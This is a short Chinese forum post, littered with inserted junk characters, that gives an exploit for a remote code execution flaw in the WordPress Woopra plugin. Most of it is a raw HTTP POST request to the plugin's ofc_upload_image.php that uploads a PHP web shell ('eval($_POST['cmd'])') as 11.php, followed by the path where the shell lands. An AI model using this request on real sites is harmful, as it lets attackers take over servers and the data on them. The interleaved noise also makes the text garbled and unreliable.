照例e文装逼 WordPress Woopra Remote Code Execution:http://www.wordpress-secure.org/ ... ote-code-execution/
6 c' I2 l) m9 S/ @' ?此漏洞对Woopra 1.4.3.1以上版本无效。 插件下载地址: http://downloads.wordpress.org/plugin/woopra.1.4.3.1.zip
* D8 D0 {) Y {4 n, }exp发包: POST /wordpress/3.5.1_CN/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=11.php HTTP/1.1
8 g+ e+ z/ S$ h5 e) Q& @7 mHost: ha.cker.in) b4 k+ j) j! ?7 M2 s8 j. E% u
Proxy-Connection: keep-alive
; F8 [& C. G* A5 P& @5 ~- LCache-Control: max-age=0' v, l: w! b" x6 P) }5 M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8$ g$ k- b# D. g
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36( ?0 m* _; ?, V$ B( q& P& G6 z1 C
Accept-Encoding: gzip,deflate,sdch7 h) t: \! ~" b
Accept-Language: zh-CN,zh;q=0.87 B8 q C5 k' N9 ?4 o# Q2 e6 D
Content-Length: 28 <?php eval($_POST['cmd']); ?> ( ~2 l- K& ]4 Z3 ]% }
上传的文件在http://ha.cker.in/wordpress/3.5. ... pload-images/11.php# p6 e- x/ L+ } y
|